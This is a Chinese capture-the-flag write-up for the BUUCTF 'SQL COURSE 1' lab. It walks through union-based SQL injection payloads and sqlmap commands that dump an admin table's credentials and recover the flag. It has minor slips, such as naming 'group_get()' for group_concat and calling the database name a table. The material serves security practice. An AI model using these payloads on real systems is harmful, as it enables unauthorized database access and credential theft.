BUUCTF BUU SQL COURSE 1
方法一:手工注入
启动靶机
寻找注入点,使用burp抓包得到传参页面
得到注入点 /backend/content_detail.php?id=1
用and 1 =1 和 and 1 =2 判断存在sql注入漏洞
查询字段数 order by 2正常显示 order by 3异常显示 字段数为2
让网页报错测试回显位 /backend/content_detail.php?id=-1 union select 1,2 测得1,2号字段都是回显位
查询数据库名,版本号,用户名
/backend/content_detail.php?id=-1 union select database(),2 得到表名news
/backend/content_detail.php?id=-1 union select version(),2 得到版本10.3.18-MariaDB
/backend/content_detail.php?id=-1 union select user(),2 得到用户root@localhost
//group_get()函数用于回显所有数据
开始sql注入爆破表名 ?id= -1 union select 1, group_concat(table_name) from information_schema.tables where table_schema = 'news' 得到表名admin,contens
爆破列名 ?id= -1 union select 1, group_concat(column_name) from information_schema.columns where table_name = 'admin' 得到列名 id,username,password
查询username,password ?id= -1 union select group_concat(username),group_concat(password) from admin
通过用户名密码登录后台 admin ef885d97427ba814d7d0faa7d574bad9
拿到flag
flag{6b8876b9-a705-4794-b623-f07dec86b58a}
方法二:sqlmap注入
启动靶机得到注入链接 /backend/content_detail.php?id=1
获取当前数据库名称 python.exe .\sqlmap.py -u "http://fc37e90a-e533-4b4a-a8bd-7d02eab1fcb1.node5.buuoj.cn:81/backend/content_detail.php?id=1" --current-db
获取表名python.exe .\sqlmap.py -u "http://fc37e90a-e533-4b4a-a8bd-7d02eab1fcb1.node5.buuoj.cn:81/backend/content_detail.php?id=1" --tables -D "news"
获取列名 python.exe .\sqlmap.py -u "http://fc37e90a-e533-4b4a-a8bd-7d02eab1fcb1.node5.buuoj.cn:81/backend/content_detail.php?id=1" --columns -D "news" -T "admin"
获取username和password值 python.exe .\sqlmap.py -u "http://fc37e90a-e533-4b4a-a8bd-7d02eab1fcb1.node5.buuoj.cn:81/backend/content_detail.php?id=1" --dump -D "news" -T "admin" -C "username,password"
登录后台拿到flag